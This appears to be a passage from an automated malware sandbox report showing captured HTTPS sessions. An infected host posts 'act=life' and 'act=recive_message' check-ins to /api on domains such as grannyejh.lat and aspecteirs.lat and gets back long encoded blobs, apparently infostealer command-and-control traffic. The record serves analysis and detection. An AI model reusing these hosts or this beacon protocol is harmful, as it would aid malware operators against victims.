00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2024-12-19 09:12:21 UTC	1137	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0olc8elmh416a5f4kl0qo9u3qn; expires=Mon, 14 Apr 2025 02:58:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YU8vUCmrKqH8mE0Q%2BIwkt7X7fxGIyn20MgvrcTIVa%2Fk6iAJj7xYOlr0en8foj5wbf6fz6Fi07DHT1lemVZsT4K4%2Fb6ScLvVP%2BSnrPdNivm5HJFLzxVP2QWPVGq8z5QjlORlvBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4644d77a74c434-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1490&rtt_var=563&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2842&recv_bytes=20907&delivery_rate=1937624&cwnd=196&unsent_bytes=0&cid=2f68777e5e9f00e8&ts=16331&x=0"
2024-12-19 09:12:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:12:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.6	50160	172.67.180.113	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:07 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: treehoneyi.click
2024-12-19 09:12:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:12:23 UTC	1119	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7a24nd2jk524d7frh9ddud504e; expires=Mon, 14 Apr 2025 02:58:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aC4yuz4V8mTMDIya4uA2PiuqTTDnDvknhptgF6OSgzEk9LJ%2FzN0g74RnpaDgbhRCV7jCpsZMGW6ooIDQLW21Nxt2fP0oAKBYFkAqPwjs4hvHyXgVBCJdQJtiNePKB8pI9DBR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4644e85e72424d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1607&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1817050&cwnd=208&unsent_bytes=0&cid=35fa404fe0a917d8&ts=15673&x=0"
2024-12-19 09:12:23 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:12:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.6	50161	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:07 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: grannyejh.lat
2024-12-19 09:12:07 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6989783370&j=
2024-12-19 09:12:20 UTC	1121	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ii2251g1a3otlbiaca457cokev; expires=Mon, 14 Apr 2025 02:58:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jj3FHM5bNBIZKf2A4ddt8O%2Fmy8q8%2FX45G0%2FOYdUik5T1x1QBQzpV0vrmEkP93gV%2BtdRTR4U1NbSeSKbRJ2zIgyjm2XtoHQHNh9T3p6kK9Pqe6zrNEGAgCe5wENuqPR79"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4644e8ba484362-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1745&rtt_var=667&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=949&delivery_rate=1624026&cwnd=250&unsent_bytes=0&cid=9cdcfb510bc81a46&ts=12935&x=0"
2024-12-19 09:12:20 UTC	248	IN	Data Raw: 31 34 38 33 0d 0a 72 63 4f 35 4a 49 54 35 36 46 41 68 58 79 54 6d 35 36 39 4b 65 78 33 4c 4a 31 44 64 6f 41 41 50 77 77 6b 52 49 74 57 73 5a 53 33 57 34 63 38 47 76 73 33 45 63 6c 49 36 42 74 79 54 33 54 38 65 4d 65 6c 47 4e 50 2b 61 5a 6d 36 76 65 6e 51 4f 39 39 6f 49 44 35 65 6c 32 45 6a 33 6e 4d 52 79 52 43 63 47 33 4c 7a 55 61 42 35 7a 36 52 31 79 75 4d 70 69 62 71 39 72 63 45 6d 36 33 41 6c 4f 78 61 2f 65 54 4f 47 61 6a 44 46 4e 4d 6b 47 44 67 73 34 67 46 58 53 6d 54 7a 33 2f 6a 43 4a 71 75 53 73 72 41 4a 6a 4a 45 55 7a 67 6f 73 70 50 70 6f 54 45 4b 77 4d 36 53 73 54 64 6a 53 73 65 66 36 64 42 4e 4c 62 49 61 47 65 6e 61 6e 56 49 70 63 55 44 52 63 57 68 33 55 33 72 6b 35 67 38 52 7a 56 4b 68 59 6a 4f 61 46 63 2f 72 6c 31 79 35 34 Data Ascii: 1483rcO5JIT56FAhXyTm569Kex3LJ1DdoAAPwwkRItWsZS3W4c8Gvs3EclI6BtyT3T8eMelGNP+aZm6venQO99oID5el2Ej3nMRyRCcG3LzUaB5z6R1yuMpibq9rcEm63AlOxa/eTOGajDFNMkGDgs4gFXSmTz3/jCJquSsrAJjJEUzgospPpoTEKwM6SsTdjSsef6dBNLbIaGenanVIpcUDRcWh3U3rk5g8RzVKhYjOaFc/rl1y54
2024-12-19 09:12:20 UTC	1369	IN	Data Raw: 49 78 58 36 4a 36 59 6c 57 36 33 67 45 50 30 4f 2f 43 42 75 47 58 79 6d 6f 44 4e 55 71 4b 67 4d 34 6e 48 6e 36 70 56 7a 32 2f 77 57 70 6c 70 57 46 38 54 37 6a 41 44 55 6a 48 71 4e 78 4a 34 5a 4f 4d 50 55 42 39 43 4d 53 43 31 57 68 42 50 34 6c 56 4d 62 7a 57 62 33 7a 68 64 44 31 5a 39 38 6b 4c 44 35 66 68 33 55 6a 6e 6c 6f 6f 67 53 7a 5a 4e 67 5a 66 47 49 52 52 79 71 55 67 34 73 4d 46 69 61 71 74 68 66 45 71 7a 77 77 70 4a 7a 36 47 62 43 4b 61 63 6b 6e 49 62 66 57 57 42 6c 63 6f 6b 44 7a 32 54 42 53 33 78 32 79 4a 71 72 53 73 72 41 4c 2f 4c 42 45 7a 45 72 74 68 4f 37 59 6d 4b 49 45 55 77 51 35 61 44 79 43 59 54 66 4c 74 50 50 4c 6e 42 61 32 61 6f 62 6e 52 45 39 34 42 48 53 4e 66 68 67 77 62 48 6c 6f 45 2b 53 53 70 47 78 4a 71 44 4d 56 6c 34 70 51 56 71 2f Data Ascii: IxX6J6YlW63gEP0O/CBuGXymoDNUqKgM4nHn6pVz2/wWplpWF8T7jADUjHqNxJ4ZOMPUB9CMSC1WhBP4lVMbzWb3zhdD1Z98kLD5fh3UjnloogSzZNgZfGIRRyqUg4sMFiaqthfEqzwwpJz6GbCKacknIbfWWBlcokDz2TBS3x2yJqrSsrAL/LBEzErthO7YmKIEUwQ5aDyCYTfLtPPLnBa2aobnRE94BHSNfhgwbHloE+SSpGxJqDMVl4pQVq/
2024-12-19 09:12:20 UTC	1369	IN	Data Raw: 68 4a 54 4e 48 72 34 35 66 44 2b 57 69 7a 30 58 73 32 62 38 78 54 54 4e 42 6b 73 58 53 5a 67 41 2f 72 6b 6c 79 35 34 4a 76 62 4b 6c 74 59 55 2b 36 7a 51 6c 42 77 4b 54 55 54 75 61 62 68 7a 64 48 4e 6b 32 48 69 4d 6b 36 45 33 2b 68 51 44 4f 31 79 43 49 6a 34 57 78 72 41 4f 2b 4f 4e 6c 6a 45 34 2b 35 46 36 4a 57 4e 4a 41 4d 69 43 4a 33 46 79 69 52 5a 4a 2b 6c 49 4f 72 72 48 62 57 79 72 5a 58 5a 4b 75 38 59 4a 54 4e 32 75 33 30 62 71 6b 34 41 2f 54 54 6c 4f 6a 59 37 47 4c 68 6c 2b 6f 77 56 38 2f 38 56 36 4c 66 6b 72 52 30 65 37 77 77 67 4e 2b 71 4c 56 53 4f 47 4e 79 69 30 4e 4a 41 61 44 69 59 31 77 57 58 4f 67 52 54 6d 31 78 6d 4a 71 72 47 35 77 52 37 54 44 41 45 58 42 70 74 39 4b 37 35 61 4d 4d 6b 51 35 51 35 61 41 78 43 51 56 50 2b 63 46 4e 61 65 43 4f 69 Data Ascii: hJTNHr45fD+Wiz0Xs2b8xTTNBksXSZgA/rkly54JvbKltYU+6zQlBwKTUTuabhzdHNk2HiMk6E3+hQDO1yCIj4WxrAO+ONljE4+5F6JWNJAMiCJ3FyiRZJ+lIOrrHbWyrZXZKu8YJTN2u30bqk4A/TTlOjY7GLhl+owV8/8V6LfkrR0e7wwgN+qLVSOGNyi0NJAaDiY1wWXOgRTm1xmJqrG5wR7TDAEXBpt9K75aMMkQ5Q5aAxCQVP+cFNaeCOi
2024-12-19 09:12:20 UTC	1369	IN	Data Raw: 41 4f 2b 4f 44 6b 62 64 72 39 56 50 36 35 32 43 4e 55 30 77 54 59 4b 4f 79 69 38 66 63 71 46 49 4e 37 7a 44 5a 6d 65 7a 61 48 68 4b 75 73 52 48 41 59 2b 6d 77 77 61 2b 32 36 30 2b 61 69 31 64 6c 70 4f 4e 4e 31 64 6d 36 55 49 2b 2f 35 6f 69 62 71 35 69 66 45 69 2f 77 51 68 4c 77 61 66 64 53 2b 4f 55 67 43 42 4c 4d 30 75 50 69 73 59 36 47 58 4b 74 53 54 61 33 79 57 67 74 37 79 74 30 57 50 65 57 52 33 72 43 72 74 74 46 38 4e 75 56 66 46 70 39 51 59 6a 46 6c 57 67 56 63 61 6c 4b 50 72 50 4a 61 6d 79 74 5a 58 52 46 76 73 59 50 58 63 36 6c 30 30 66 6f 6c 49 73 32 52 6a 68 43 67 34 48 4c 4a 31 6b 78 36 55 49 71 2f 35 6f 69 51 6f 5a 65 4d 57 47 4e 6a 68 67 42 31 75 48 63 53 71 62 44 79 6a 35 41 4d 55 36 4c 67 38 51 6b 45 33 61 69 53 54 6d 37 7a 6d 74 6f 70 32 70 Data Ascii: AO+ODkbdr9VP652CNU0wTYKOyi8fcqFIN7zDZmezaHhKusRHAY+mwwa+260+ai1dlpONN1dm6UI+/5oibq5ifEi/wQhLwafdS+OUgCBLM0uPisY6GXKtSTa3yWgt7yt0WPeWR3rCrttF8NuVfFp9QYjFlWgVcalKPrPJamytZXRFvsYPXc6l00folIs2RjhCg4HLJ1kx6UIq/5oiQoZeMWGNjhgB1uHcSqbDyj5AMU6Lg8QkE3aiSTm7zmtop2p
2024-12-19 09:12:20 UTC	904	IN	Data Raw: 41 42 47 33 61 2f 57 53 65 36 54 67 7a 4e 48 4f 45 75 43 69 63 63 70 48 6e 47 6e 54 58 4c 78 67 6d 56 31 34 54 4d 7a 59 61 66 56 46 56 6e 43 67 4e 5a 4a 70 6f 54 45 4b 77 4d 36 53 73 54 64 6a 53 45 4c 65 36 52 58 4f 37 6a 4d 62 57 36 7a 61 6e 35 4c 70 63 6b 49 53 38 69 74 33 55 6e 67 6d 6f 38 34 54 7a 70 44 6a 34 72 42 61 46 63 2f 72 6c 31 79 35 34 4a 4d 5a 72 4a 38 63 45 36 38 32 42 77 50 30 4f 2f 43 42 75 47 58 79 6d 6f 44 50 6b 32 50 67 63 30 6b 47 58 75 6b 52 53 43 77 78 57 56 6b 71 6e 6c 35 52 37 44 46 44 30 54 41 70 38 6c 4b 36 49 6d 50 49 46 46 39 43 4d 53 43 31 57 68 42 50 35 39 43 49 71 2f 42 49 46 79 33 61 47 56 4c 75 73 4a 48 55 49 47 34 6d 30 48 71 32 39 4a 79 52 54 4a 50 68 34 72 4d 49 52 56 79 72 45 77 33 76 73 52 6d 5a 36 74 72 64 55 61 32 Data Ascii: ABG3a/WSe6TgzNHOEuCiccpHnGnTXLxgmV14TMzYafVFVnCgNZJpoTEKwM6SsTdjSELe6RXO7jMbW6zan5LpckIS8it3Ungmo84TzpDj4rBaFc/rl1y54JMZrJ8cE682BwP0O/CBuGXymoDPk2Pgc0kGXukRSCwxWVkqnl5R7DFD0TAp8lK6ImPIFF9CMSC1WhBP59CIq/BIFy3aGVLusJHUIG4m0Hq29JyRTJPh4rMIRVyrEw3vsRmZ6trdUa2
2024-12-19 09:12:20 UTC	1369	IN	Data Raw: 33 34 39 39 0d 0a 64 54 4f 4b 59 67 7a 46 45 4e 45 43 50 68 73 63 6e 48 6e 6d 74 52 54 6d 34 7a 47 52 6f 71 6d 49 7a 44 76 66 4a 48 77 2b 58 34 66 31 6c 39 49 6d 34 50 45 41 6d 42 70 76 4c 31 47 67 65 63 2b 6b 64 63 72 54 4b 62 58 2b 6b 59 6e 74 45 76 73 34 44 52 63 4b 6d 32 30 50 72 6e 6f 34 38 52 7a 70 47 69 49 72 4b 49 42 5a 37 71 55 70 79 38 59 4a 6c 64 65 45 7a 4d 32 43 38 32 43 5a 42 78 4c 4f 62 57 61 69 43 79 6a 56 50 66 52 37 45 69 38 51 70 45 58 47 6c 54 54 61 74 77 6d 6c 6b 72 6d 70 38 51 4c 54 50 44 55 66 64 70 39 74 4e 37 70 79 43 4e 6b 30 76 52 34 76 46 67 32 67 65 5a 2b 6b 64 63 6f 37 55 5a 57 71 75 4b 56 70 48 72 4d 38 4e 54 4d 53 74 6d 31 6d 6f 67 73 6f 31 54 33 30 65 78 49 6a 42 4a 52 31 74 70 55 55 79 74 73 56 6f 66 36 35 6b 66 6b 4f 33 Data Ascii: 3499dTOKYgzFENECPhscnHnmtRTm4zGRoqmIzDvfJHw+X4f1l9Im4PEAmBpvL1Ggec+kdcrTKbX+kYntEvs4DRcKm20Prno48RzpGiIrKIBZ7qUpy8YJldeEzM2C82CZBxLObWaiCyjVPfR7Ei8QpEXGlTTatwmlkrmp8QLTPDUfdp9tN7pyCNk0vR4vFg2geZ+kdco7UZWquKVpHrM8NTMStm1mogso1T30exIjBJR1tpUUytsVof65kfkO3
2024-12-19 09:12:20 UTC	1369	IN	Data Raw: 32 67 30 55 72 6e 6e 49 30 35 55 54 5a 55 6a 34 33 4f 4a 68 46 32 71 55 73 79 76 73 39 69 4c 65 38 72 64 46 6a 33 6c 6b 64 71 37 4c 62 4e 54 4b 53 34 6e 53 52 4a 4f 6b 71 53 6a 73 77 72 44 33 4b 35 42 58 7a 2f 30 32 56 38 34 54 4e 6c 55 4b 44 4a 47 41 48 57 34 64 78 4b 70 73 50 4b 4f 55 77 7a 53 34 2b 42 78 43 30 52 66 4b 78 41 4f 4c 50 4f 59 32 57 6f 59 58 5a 46 73 63 51 45 51 63 43 67 31 30 4c 76 6c 59 4e 79 44 58 31 42 6e 4d 57 56 61 43 39 76 72 6c 30 2f 72 34 42 51 62 72 42 36 5a 6b 32 6e 79 45 56 67 7a 4b 33 59 51 2b 47 4c 79 69 30 4e 4a 41 61 44 69 59 31 77 57 58 2b 74 53 54 47 34 7a 47 31 67 72 6d 78 34 54 37 33 41 46 55 44 4b 71 64 64 4f 36 34 6d 41 4f 46 45 30 54 34 6d 4c 78 54 6f 61 50 2b 63 46 4e 61 65 43 4f 69 32 54 59 58 42 4d 6f 63 4d 49 44 Data Ascii: 2g0UrnnI05UTZUj43OJhF2qUsyvs9iLe8rdFj3lkdq7LbNTKS4nSRJOkqSjswrD3K5BXz/02V84TNlUKDJGAHW4dxKpsPKOUwzS4+BxC0RfKxAOLPOY2WoYXZFscQEQcCg10LvlYNyDX1BnMWVaC9vrl0/r4BQbrB6Zk2nyEVgzK3YQ+GLyi0NJAaDiY1wWX+tSTG4zG1grmx4T73AFUDKqddO64mAOFE0T4mLxToaP+cFNaeCOi2TYXBMocMID
2024-12-19 09:12:20 UTC	1369	IN	Data Raw: 34 36 4a 79 65 4e 55 30 37 52 73 54 4c 6a 53 64 5a 4a 35 41 46 65 76 2f 39 4c 43 32 35 4b 79 73 41 67 73 30 4a 51 63 69 33 79 67 76 46 6a 4a 77 34 57 48 39 67 67 35 54 45 50 68 52 74 36 51 74 79 75 59 49 36 50 65 38 72 64 31 48 33 6c 6c 63 64 6c 50 53 49 45 62 62 4a 6c 58 78 61 66 56 44 45 33 5a 39 6d 57 57 33 70 48 58 4c 34 77 58 42 2f 70 32 68 6c 51 2f 44 77 4f 57 2f 45 74 39 70 4c 37 5a 65 30 44 46 59 2b 53 49 71 43 32 7a 6c 5a 4d 65 6c 4b 63 75 66 37 49 69 58 68 56 44 30 41 72 34 35 66 44 2f 71 69 31 55 6a 68 6a 5a 74 2f 59 7a 5a 51 68 59 6a 47 4a 46 74 2b 70 46 55 31 2f 34 77 69 61 2b 45 7a 49 77 37 33 79 68 59 50 6c 2f 47 4a 48 62 50 49 33 57 49 52 49 67 69 64 78 64 74 6f 51 53 33 6e 42 53 44 2f 6d 69 49 71 6f 6e 6c 68 52 72 54 59 42 41 6a 78 6e 2f Data Ascii: 46JyeNU07RsTLjSdZJ5AFev/9LC25KysAgs0JQci3ygvFjJw4WH9gg5TEPhRt6QtyuYI6Pe8rd1H3llcdlPSIEbbJlXxafVDE3Z9mWW3pHXL4wXB/p2hlQ/DwOW/Et9pL7Ze0DFY+SIqC2zlZMelKcuf7IiXhVD0Ar45fD/qi1UjhjZt/YzZQhYjGJFt+pFU1/4wia+EzIw73yhYPl/GJHbPI3WIRIgidxdtoQS3nBSD/miIqonlhRrTYBAjxn/
2024-12-19 09:12:20 UTC	1369	IN	Data Raw: 30 6d 41 4e 66 55 4b 56 78 5a 56 34 53 79 54 38 46 6d 58 76 6b 48 30 6a 75 43 74 6c 41 4f 2b 63 53 51 2f 64 34 59 4d 47 6f 5a 69 59 49 45 55 2b 55 49 66 43 38 78 59 2f 66 4b 35 44 4d 62 48 56 63 79 2b 4f 61 48 68 4d 75 38 6b 52 63 66 47 30 32 45 6a 6f 6e 4a 77 6a 41 33 4d 47 69 38 57 56 45 56 6c 75 6f 30 4a 2b 39 34 35 7a 66 71 39 67 5a 55 66 33 38 55 6b 50 31 2b 47 44 42 74 4f 59 68 44 78 45 4b 31 66 4a 6f 38 34 76 48 33 79 6e 55 69 50 2f 6a 43 4a 72 34 54 4d 68 44 76 66 4b 46 67 2b 58 38 59 6b 64 73 38 6a 64 59 68 45 69 43 4a 33 46 32 32 68 42 4c 4f 63 46 49 50 2b 61 49 69 71 76 5a 6e 4a 44 75 63 30 56 58 63 6d 69 7a 55 57 68 70 62 51 58 54 6a 42 44 69 6f 4c 7a 46 6a 68 31 75 55 67 39 75 50 78 63 57 72 42 73 59 77 4b 52 7a 52 46 4d 6a 2b 2b 62 58 71 62 Data Ascii: 0mANfUKVxZV4SyT8FmXvkH0juCtlAO+cSQ/d4YMGoZiYIEU+UIfC8xY/fK5DMbHVcy+OaHhMu8kRcfG02EjonJwjA3MGi8WVEVluo0J+945zfq9gZUf38UkP1+GDBtOYhDxEK1fJo84vH3ynUiP/jCJr4TMhDvfKFg+X8Ykds8jdYhEiCJ3F22hBLOcFIP+aIiqvZnJDuc0VXcmizUWhpbQXTjBDioLzFjh1uUg9uPxcWrBsYwKRzRFMj++bXqb

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.6	50178	104.21.66.85	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:13 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 50 Host: aspecteirs.lat
2024-12-19 09:12:13 UTC	50	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=CVmr0t--installs&j=
2024-12-19 09:12:27 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=73h3kl18nlojjobjclksv6gcdm; expires=Mon, 14 Apr 2025 02:58:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8W12twiY5YpJ%2BpWVZff1KPscSLDxrlhAuoAqJ7NMIepQlYRk5k3yrsL5TWtzy2wxahMT84wzpS1DR7pd4Ej%2BWqjpie%2FjZymefks0DlJIIxTlR0BXHIdiD0VTjq9rKBw4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464510c8a942de-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1771&rtt_var=671&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=948&delivery_rate=1648785&cwnd=230&unsent_bytes=0&cid=eb12ce4655cd0c04&ts=13332&x=0"
2024-12-19 09:12:27 UTC	242	IN	Data Raw: 34 36 36 0d 0a 57 57 4c 57 71 47 42 46 4b 66 64 56 77 70 56 77 44 74 34 4f 35 6d 56 51 67 43 6f 5a 72 55 54 66 61 6f 41 71 64 65 62 55 72 38 67 69 51 4b 43 4b 57 6e 45 46 31 53 61 6e 74 30 70 36 72 48 75 44 53 58 4c 68 54 6a 75 58 49 72 34 47 38 30 39 5a 78 4b 4c 43 36 6d 4d 45 74 38 51 54 49 41 58 56 4d 4c 71 33 53 6c 57 6c 4c 49 4d 4c 63 72 6f 49 66 4d 63 6d 76 67 62 69 53 78 36 4a 70 4d 4f 72 4d 51 36 78 77 41 55 6d 54 5a 59 35 72 2f 41 56 61 37 39 6b 69 41 77 39 36 45 63 37 67 57 61 36 45 4b 49 51 56 36 75 78 32 36 6b 55 41 36 58 44 51 6a 67 46 6a 48 65 6e 2b 31 49 30 2f 47 2b 44 42 7a 7a 6d 54 6e 4c 46 4c 4c 63 4f 34 30 34 66 6c 72 33 4a 6f 44 45 41 73 73 45 50 4c 31 6d 62 4d 36 6a 37 45 32 47 2f 4c 4d 70 48 4e Data Ascii: 466WWLWqGBFKfdVwpVwDt4O5mVQgCoZrUTfaoAqdebUr8giQKCKWnEF1Sant0p6rHuDSXLhTjuXIr4G809ZxKLC6mMEt8QTIAXVMLq3SlWlLIMLcroIfMcmvgbiSx6JpMOrMQ6xwAUmTZY5r/AVa79kiAw96Ec7gWa6EKIQV6ux26kUA6XDQjgFjHen+1I0/G+DBzzmTnLFLLcO404flr3JoDEAssEPL1mbM6j7E2G/LMpHN
2024-12-19 09:12:27 UTC	891	IN	Data Raw: 66 6f 49 49 34 39 31 6a 77 76 7a 57 51 4b 4a 70 73 76 71 4a 45 36 74 69 67 55 72 43 38 31 33 71 50 73 63 61 62 39 6a 67 77 59 79 38 45 64 37 7a 43 36 31 44 4f 68 48 47 49 75 34 78 36 30 7a 43 62 50 46 42 53 39 4e 6d 6a 54 67 75 56 4a 72 70 43 7a 63 52 78 4c 79 53 33 6a 62 4b 36 78 49 2f 51 59 4f 78 4c 48 42 36 6d 4e 41 73 73 51 44 4b 6b 75 48 50 36 76 38 46 33 36 33 5a 59 6b 4b 4d 75 39 43 64 4d 77 6d 75 67 4c 6f 52 78 32 41 75 38 43 73 4f 77 44 30 68 45 49 67 55 39 56 76 34 4e 51 58 66 4c 74 67 6b 6b 55 49 6f 6c 63 31 31 6d 61 36 42 4b 49 51 56 34 79 7a 7a 71 6b 77 44 37 66 43 43 54 56 4c 68 7a 47 74 38 67 42 71 75 57 4b 4f 42 43 44 6f 52 6e 33 4d 4c 37 59 42 35 30 38 54 78 50 69 4e 72 53 4e 41 37 49 6f 6a 4b 6b 43 5a 50 62 66 33 55 6e 50 79 64 63 51 41 Data Ascii: foII491jwvzWQKJpsvqJE6tigUrC813qPscab9jgwYy8Ed7zC61DOhHGIu4x60zCbPFBS9NmjTguVJrpCzcRxLyS3jbK6xI/QYOxLHB6mNAssQDKkuHP6v8F363ZYkKMu9CdMwmugLoRx2Au8CsOwD0hEIgU9Vv4NQXfLtgkkUIolc11ma6BKIQV4yzzqkwD7fCCTVLhzGt8gBquWKOBCDoRn3ML7YB508TxPiNrSNA7IojKkCZPbf3UnPydcQA
2024-12-19 09:12:27 UTC	1369	IN	Data Raw: 34 34 62 36 0d 0a 75 73 57 59 63 4a 50 4f 56 65 4f 39 42 6f 70 45 6a 6c 52 46 66 63 39 73 4b 6c 4e 41 69 30 79 77 59 71 54 35 51 36 72 50 34 52 59 4c 42 6b 69 51 73 32 37 55 42 7a 7a 43 36 76 42 75 78 4f 45 59 53 7a 6a 65 52 37 42 36 79 4b 57 6d 64 76 6d 79 43 30 2f 46 42 5a 76 32 4b 4b 41 43 53 69 56 7a 58 57 5a 72 6f 45 6f 68 42 58 69 72 76 47 70 6a 77 4a 74 63 6b 43 4c 55 57 61 50 61 6a 2f 45 6d 47 39 5a 34 77 42 50 2b 6c 48 64 4d 67 75 76 67 54 6e 52 52 54 45 2b 49 32 74 49 30 44 73 69 69 63 70 53 49 51 6d 34 73 49 52 59 72 4a 72 6b 6b 63 74 72 46 45 37 79 43 72 39 55 4b 4a 43 45 49 4f 79 77 4b 41 34 42 4c 44 48 44 53 35 43 6e 43 57 71 2b 78 78 2b 73 57 61 42 43 54 37 6e 52 33 76 4f 4a 37 4d 43 36 51 68 5a 78 4c 48 56 36 6d 4e 41 6d 38 63 53 4e 55 47 Data Ascii: 44b6usWYcJPOVeO9BopEjlRFfc9sKlNAi0ywYqT5Q6rP4RYLBkiQs27UBzzC6vBuxOEYSzjeR7B6yKWmdvmyC0/FBZv2KKACSiVzXWZroEohBXirvGpjwJtckCLUWaPaj/EmG9Z4wBP+lHdMguvgTnRRTE+I2tI0DsiicpSIQm4sIRYrJrkkctrFE7yCr9UKJCEIOywKA4BLDHDS5CnCWq+xx+sWaBCT7nR3vOJ7MC6QhZxLHV6mNAm8cSNUG
